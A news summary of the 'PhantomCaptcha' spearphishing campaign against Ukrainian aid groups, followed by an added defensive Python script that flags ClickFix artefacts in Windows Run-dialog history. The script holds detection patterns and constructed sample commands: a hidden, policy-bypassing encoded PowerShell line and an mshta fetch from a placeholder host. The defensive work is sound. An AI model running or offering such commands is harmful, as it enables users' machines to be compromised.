‘PhantomCaptcha’ hackers impersonate Ukrainian president’s office in attack on war relief workers
Summary
Cybersecurity researchers at SentinelLabs uncovered a carefully planned spearphishing campaign, tracked as “PhantomCaptcha,” that impersonated the Office of the President of Ukraine and targeted individuals at humanitarian organisations on 8 October. Victims included members of the International Committee of the Red Cross, the Norwegian Refugee Council, UNICEF and several Ukrainian regional administrations.
The attackers used an eight-page weaponised PDF that redirected victims to a fake Cloudflare DDoS gateway hosted on a server tied to Russian provider KVMKA. The lure offered two compromise paths: connect to a password-protected Zoom meeting (allowing live social engineering), or follow a “ClickFix” / “Paste and Run” trick that persuaded Windows users to paste a token into a Run dialog, thereby executing a PowerShell payload.
SentinelLabs found evidence of six months’ preparatory work and compartmentalised infrastructure. Although the public-facing domains went offline the same day, backend command-and-control components persisted and a similar domain was registered the next day, suggesting potential continued operations. Researchers also noted possible links to a broader campaign using adult-entertainment lures and APKs, with tentative ties to Russia/Belarus development sources. Attribution remains unconfirmed.
Key Points
- The PhantomCaptcha spearphishing campaign impersonated Ukraine’s presidential office and targeted humanitarian and regional government contacts on 8 October.
- Attackers used weaponised PDFs that redirected victims to a fake Cloudflare DDoS page hosted on a server associated with provider KVMKA.
- Two compromise vectors were possible: a staged Zoom call for live social engineering, or a “Paste and Run” PowerShell execution (ClickFix) that bypasses file-based endpoint defences.
- Infrastructure shows six months of preparation, strong compartmentalisation and rapid takedown of public lures, but some backend C2 remained active afterwards.
- Researchers flagged a related cluster using adult-entertainment lures and an APK; possible links to Russia/Belarus development were noted but not confirmed.
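A defensive check for the "Paste and Run" path described in the summary and in the third key point: an added Python example, not code from the article or from SentinelLabs, that triages a host's Run-dialog history for ClickFix hallmarks. The RunMRU registry key is real; the indicator patterns are this example's own heuristics and the sample values are constructed.

```python
# Heuristic triage of Windows Run-dialog history for ClickFix / "Paste and Run"
# artefacts. Added example, not part of the original article or SentinelLabs' work.
# Input strings mimic values exported from the RunMRU key
# (HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU), where each
# value is the command the user typed followed by a literal "\1" suffix.
import re
from typing import List, Optional, Tuple

# Hosts that execute script passed on the command line or fetched remotely.
LAUNCHERS = re.compile(
    r'^(?:"?[a-z]:\\[^\s"]*\\)?(powershell|pwsh|mshta|cmd|wscript|cscript|'
    r'curl|certutil|bitsadmin|rundll32)(?:\.exe)?\b', re.I)

# Switches and idioms that hide the window, bypass policy or run fetched code.
# These are the example's own heuristics, not a vendor signature set.
INDICATORS = {
    "hidden_window": r"-w(?:indowstyle)?\s+h(?:idden)?\b",
    "policy_bypass": r"-e(?:xecutionpolicy|p)\s+bypass\b",
    "encoded_command": r"-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}",
    "download_cradle": r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|downloadfile|net\.webclient)\b",
    "inline_eval": r"\b(?:iex|invoke-expression)\b",
    "remote_url": r"https?://",
    "captcha_lure_text": r"#.*(?:not a robot|captcha|verif|human)",  # lure comment pasted along
}

def strip_runmru(value: str) -> str:
    """RunMRU stores 'command\\1'; drop that suffix when present."""
    return value[:-2] if value.endswith("\\1") else value

def triage(value: str) -> Tuple[str, Optional[str], List[str]]:
    """Return (verdict, launcher, matched indicators) for one RunMRU value."""
    cmd = strip_runmru(value).strip()
    m = LAUNCHERS.match(cmd)
    if not m:
        return "benign", None, []          # ordinary Run-dialog use, e.g. notepad
    launcher = m.group(1).lower()
    hits = [name for name, rx in INDICATORS.items() if re.search(rx, cmd, re.I)]
    if len(hits) >= 2:
        return "high", launcher, hits      # several ClickFix hallmarks together
    return ("suspicious" if hits else "low"), launcher, hits

# Constructed sample values, not data captured from the campaign.
SAMPLE_RUNMRU = [
    "notepad\\1",
    "\\\\fileserver\\share\\1",
    "cmd\\1",
    "powershell -w hidden -ep bypass -enc QUFBQUFBQUFBQUFBQUFBQUFB # I am not a robot\\1",
    "mshta https://example.invalid/verify.hta\\1",
]

def triage_all(values=SAMPLE_RUNMRU):
    """Keep only entries worth an analyst's attention."""
    return [(v, *triage(v)) for v in values if triage(v)[0] in ("suspicious", "high")]
```

Feed it values exported from an endpoint (or the equivalent process-creation telemetry) rather than the constructed sample; the indicator list is a starting point for hunting, not an exhaustive signature.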
Why should I read this?
Short answer: because this isn’t just another phishing email. Aid groups and regional admins supporting Ukraine were specifically targeted with a clever paste-and-run trick and fake conferencing lures — techniques that get users to run malicious code themselves and dodge many usual defences. If you work in humanitarian ops, IT security for NGOs, or handle sensitive coordination for Ukraine relief, this story tells you exactly what to look out for so you can stop it before it hits your people.
Source
Source: https://therecord.media/phantomcaptcha-spearphishing-campaign-ukraine-war-relief-groups
